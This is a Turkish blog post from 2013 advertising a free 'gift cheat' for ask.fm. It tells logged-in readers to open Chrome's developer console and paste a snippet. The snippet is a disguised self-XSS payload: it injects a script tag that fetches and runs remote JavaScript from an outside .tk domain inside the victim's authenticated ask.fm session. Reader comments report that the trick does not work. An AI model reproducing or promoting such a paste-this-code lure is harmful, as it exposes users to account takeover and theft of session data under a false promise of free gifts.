Ask.fm Hediye Hilesi Kodu

Perşembe, 4 Temmuz 2013, 12:08 | İnternet | 4 Yorumlar
Yazar: enbilen
-Sponsor Reklamlar-

ask.fm 300x184 Ask.fm Hediye Hilesi KoduSosyal ağların popüler hale gelmesiyle birlikte bir çok yeni uygulama ile de tanışır olduk bu uygulamalar arasında hiç şüphesiz en popülerlerden biriside soru sorma uygulaması olan ask.fm’dir. Anonim olarak soru sorulabilmesinin yanı sıra hesaplar ile de soru sorma sistemi kısa süre içerisinde diğer Avrupa ülkelerinde yakaladığı ünü bizim ülkemizde de yakalamayı başardı. Bildiğiniz gibi ask.fm servisi üzerinden bazı özelliklere ancak ücretli olarak ulaşabiliyoruz. Bunların başında gelen özelliklerden birisi de hediye gönderme özelliğidir. Hediye gönderme özelliği çoğu zaman jest yapabilmenin sanal ortamda en popüler yollarından birisidir. Ancak ücretli olması ve ücretlerinin çok da ufak olmaması ise en çok can sıkıcı taraflardan birisi oluyor.

Elbette bazı güvenlik açıklarından faydalanarak bu hediyelere ücretsiz olarak sahip olmanın ya da gönderebilmenin de yolları mevcut. Ask.fm hediye hilesini gerçekleştirmek aslında oldukça basit bir işlem ve bu işlemi meydana getirmek içinse herhangi bir yazılım ya da benzeri bir şeye ihtiyacınız yok. Yalnızca hileyi gerçekleştirebilmek için Google tarafından sağlanan Google Chrome kullanmanız gerekiyor. Bu hile için bizlere gerekli olan basit bir kod var bu koda yazımızın sonunda erişebilmeniz mümkündür. İlk önce ask.fm profiliniz ile giriş yapıyorsunuz. Giriş yaptıktan sonra ise profilinize ulaşmanız gerekiyor. Profil sayfanıza da erişimi sağladıysanız eğer o zaman F12 tuşuna basıyorsunuz.

Bu tuşa bastığınızda karşınıza bir panel görüntüsü gelecektir. Bu panel görüntüsünden CONSOLE’a girmeniz gerekiyor. Bu alana girişi yaptıktan hemen sonra aşağıda yazımızın sonunda vermiş olduğumuz Ask.fm hediye hile kodunu yapıştırıp, enter tuşuna basıyorsunuz. Eğer hile ile hediyeleriniz gelmez ise sayfayı yenilemeniz gerekebiliyor. Bu durumda dilerseniz F5 ya da CTRL + R seçenekleri ile sayfanızı yenileyerek size ulaşan hediyelerinizi görebilirsiniz. Anlatım da takıldığınız herhangi bir yer olursa Youtube aracılığı ile bu hilenin canlı olarak nasıl uygulandığını da görebilmeniz mümkün. Ancak elbette videodan aşağıda vereceğimiz kodu almanız pek mümkün olmayacaktır. Bu nedenle bu sayfayı kapatmayın uygulamanız aşamasında size lazım olacak olan koda sayfamızın altından ulaşın.

Kod; function addJavascript(jsname){ var th = document.getElementsByTagName('head')[0]; var s = document.createElement('script'); s.setAttribute('type','text/javascript'); s.setAttribute('src',jsname); th.appendChild(s); } if(location.hostname.indexOf("ask.fm") >= 0){ addJavascript('http://cetlepaylas.tk/askfmhediye.js'); }

-Sponsor Reklamlar-
Etiketler: , , , ,

4 responses to "Ask.fm Hediye Hilesi Kodu"

 1. sananeee? diyor ki:

  hepiniz aynı kodu yapıştırıyorsunuz bi şey olmuyor kalıcı değil f5 yapınca gidiyor

 2. sadDFA diyor ki:

  nasıl kodu yapıştırıyoruz ?

 3. dsdasdsa diyor ki:

  ya olmuyo işte niye zorluyonuz kii !!!

 4. gizem diyor ki:

  olmuyooooo

Yorum Yazın: